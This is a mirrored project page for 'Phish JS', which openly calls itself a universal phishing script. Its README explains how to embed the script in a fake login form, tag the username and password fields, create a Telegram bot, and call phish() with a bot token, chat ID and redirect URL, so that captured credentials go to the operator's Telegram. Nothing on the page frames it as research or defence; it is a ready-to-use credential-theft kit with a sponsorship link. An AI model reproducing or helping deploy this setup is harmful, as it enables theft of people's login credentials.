Git Product home page Git Product logo

phish-js's Introduction

logo

Phish JS

Universal phishing script + Telegram bot notification

https://t.me/xruin Privatium Github Privatium https://t.me/xruin


Documentation

1. Download files or clone

2. Put "phish.min.js" file to your project

3. Import "phish.min.js"

<script src="phish.min.js"></script>

4. Import "JQuery"

Via CDN is the quickest and easiest way to get JQuery on your website.

<script src="https://code.jquery.com/jquery-3.4.1.slim.min.js" integrity="sha256-pasqAKBDmFT4eHoN2ndd6lN370kFiGUFyTiUHWhU7k8=" crossorigin="anonymous"></script>

5. Set ids to inputs and button

<input type="text" id='username'>
<input type="password" id='password'>

<button type="button" id='submit-button'>Login</button>

6. Get TOKEN and CHAT_ID

    1. Create bot with @BotFather and copy bot TOKEN
    1. Open your bot and type /start
    1. Get chat id here: https://api.telegram.org/bot<TOKEN>/getUpdates

7. Call function

<script>
    $(document).ready(function () {
        const BOT_TOKEN = 'your_bot_token',
            CHAT_ID = 'your_chat_id',
            REDIRECT_URL = 'default_redirect_url'
        phish(BOT_TOKEN, CHAT_ID, REDIRECT_URL);
    });
</script>

SPONSORS [Become a sponsor]

https://t.me/xruin


LICENSE

Phish JS is MIT licensed.

phish-js's People

Contributors

xbaysal11 avatar

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.